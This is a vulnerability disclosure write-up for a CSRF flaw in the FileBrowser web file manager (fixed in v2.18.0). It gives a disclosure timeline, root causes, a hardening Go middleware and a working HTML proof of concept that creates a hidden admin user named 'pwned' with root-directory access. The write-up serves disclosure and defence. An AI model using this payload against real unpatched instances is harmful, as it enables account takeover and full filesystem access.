CVE-2021-46398: Critical CSRF in FileBrowser

A Cross-Site Request Forgery (CSRF) vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim.


Introduction

This is Febin, a security professional.

I used to pick random open-source software for my research; recently I took some web-based file management software as my research targets. There I found some popular web-based file managers, one of them was a software named “FileBrowser”. While poking around I was able to find an awesome vulnerability in the application that leads to account takeover, complete access to the filesystem and command execution. This article is going to be on that vulnerability.

Disclosure Timeline:

October 16, 2021 - Contacted the vendor and reported the vulnerability

October 19, 2021 - Vendor replies back

October 30, 2021 - Vulnerability has been patched in version v2.18.0

Vendor/Software - Product Details

Filebrowser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit your files. It allows the creation of multiple users and each user can have its own directory. It can be used as a standalone app or as a middleware.

Link: https://filebrowser.org/

Github Repo: https://github.com/filebrowser/filebrowser

The Vulnerability:

FileBrowser is a popular file manager / file managing interface written in Go. An admin can create multiple users, including additional admin-privileged users, and grant each of them access to any directory; user creation is handled by the "/api/users" endpoint.

The endpoint accepts input in JSON format to create users, but fails to verify the “Content-Type” HTTP header: its value should be “application/json”, yet “text/plain” is accepted as well, and that is where the vulnerability arises (an HTML form can submit a text/plain body cross-site, whereas it cannot send application/json). Also the “Origin” header is not validated and there are no anti-CSRF tokens implemented either.

Hence an attacker can easily exploit this vulnerability to create a backdoor user with admin privileges and access to the home directory or whichever directory the attacker wants, just by sending a malicious webpage URL to the legitimate admin, and then access the whole filesystem of the victim.

[Image: fbrowser_csrf_request.png]

Affected Versions: v2.17.2 and below (<= 2.17.2)

Proof Of Concept:

The HTML code below exploits the flaw:

<html>
<body style="text-align:center;">
<h1> FileBrowser CSRF PoC by Febin </h1>
<form action="http://ubuntu.local:8080/api/users" method="POST" enctype="text/plain">
  <input type="hidden" name='{"what":"user","which":[],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"username":"pwned","password":"","rules":[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}],"lockPassword":false,"id":0,"password":"pwned"}}' value='test'>
  <input type="submit" value="CLICK ME!">
</form>
</body>
</html>

1. I started a filebrowser instance inside my Ubuntu VM.

[Image: fb_csrf.png]

2. I hosted the exploit on a simple HTTP server inside my host OS.

[Image: fbrowser_csrf1.png]

[Image: fbrowser_csrf2.png]

3. When I click the “CLICK ME!” button, it sends a POST request in the background to the filebrowser URL, which creates a backdoor user named “pwned” with access to the “/root/” directory.

[Image: fbrowser_csrf3.png]

[Image: fbrowser_csrf4.png]

Logged in as the pwned user.

[Image: fbrowser_csrf_root.png]

Root Cause:

1. X-Auth header is not validated properly

2. No Anti-CSRF token

3. Using the content type “text/plain” makes the attack possible

4. Origin header is not validated

[Image: fbrowser_csrf_request.png]
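To make the root causes concrete from the defender's side, here is an added example of a small Go middleware that closes the gaps listed above on a state-changing JSON endpoint such as "/api/users". This is illustrative code written for this article, not FileBrowser's own code or its actual patch: the guard name csrfGuard, the stand-in backend handler and the attacker origin "http://evil.example" are all constructed. It enforces an application/json content type (which an HTML form cannot produce), compares a present Origin header against the request Host, and rejects requests the browser itself labels cross-site; the simulate helper replays the shapes of request seen in the PoC through the guard and returns the resulting status code.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// csrfGuard is a hypothetical hardening middleware (added example, not
// FileBrowser's own code). It wraps a state-changing JSON API handler and
// closes the three gaps listed in the root cause section: it insists on a
// JSON content type, rejects foreign Origins, and honours the browser's
// Sec-Fetch-Site hint when present.
func csrfGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// Safe methods change no state, so they pass through unchanged.
		switch r.Method {
		case http.MethodGet, http.MethodHead, http.MethodOptions:
			next.ServeHTTP(w, r)
			return
		}
		// 1. An HTML form can only send application/x-www-form-urlencoded,
		//    multipart/form-data or text/plain. Requiring application/json
		//    refuses the text/plain form post before the body is parsed.
		ct := strings.ToLower(r.Header.Get("Content-Type"))
		if !strings.HasPrefix(ct, "application/json") {
			http.Error(w, "unsupported media type", http.StatusUnsupportedMediaType)
			return
		}
		// 2. Browsers attach Origin to cross-site POSTs and a page cannot
		//    forge it; when present it must name this server.
		if origin := r.Header.Get("Origin"); origin != "" && !sameOrigin(origin, r.Host) {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		// 3. Modern browsers also send Sec-Fetch-Site; "cross-site" is never
		//    legitimate for a write to this API.
		if r.Header.Get("Sec-Fetch-Site") == "cross-site" {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// sameOrigin reports whether the Origin header's host (host and port)
// matches the Host the request was addressed to, case-insensitively.
func sameOrigin(origin, host string) bool {
	u, err := url.Parse(origin)
	if err != nil || u.Host == "" {
		return false
	}
	return strings.EqualFold(u.Host, host)
}

// simulate sends one request through the guard and returns the status code.
// The backend stand-in answers 201 so a pass-through is visible. The target
// URL mirrors the PoC; the origin "http://evil.example" is a constructed
// placeholder for an attacker-controlled page.
func simulate(method, contentType, origin string) int {
	backend := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusCreated)
	})
	req := httptest.NewRequest(method, "http://ubuntu.local:8080/api/users",
		strings.NewReader(`{"what":"user","which":[],"data":{"username":"pwned"}}`))
	if contentType != "" {
		req.Header.Set("Content-Type", contentType)
	}
	if origin != "" {
		req.Header.Set("Origin", origin)
	}
	rec := httptest.NewRecorder()
	csrfGuard(backend).ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	fmt.Println("PoC-style form post (text/plain, cross-site):",
		simulate("POST", "text/plain", "http://evil.example")) // 415
	fmt.Println("JSON body but foreign Origin:",
		simulate("POST", "application/json", "http://evil.example")) // 403
	fmt.Println("same-origin JSON call:",
		simulate("POST", "application/json", "http://ubuntu.local:8080")) // 201
}
```

The Content-Type check alone already defeats the form-based PoC, because form submissions cannot carry application/json; the Origin and Sec-Fetch-Site checks add defence in depth against other cross-site delivery routes, and a per-session anti-CSRF token or a required custom request header would be the usual further layer.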

PATCH

Update to the latest version; the flaw has been patched as of v2.18.0.

Commit: https://github.com/filebrowser/filebrowser/commit/74b7cd8e81840537a8206317344f118093153e8d

Thank you.
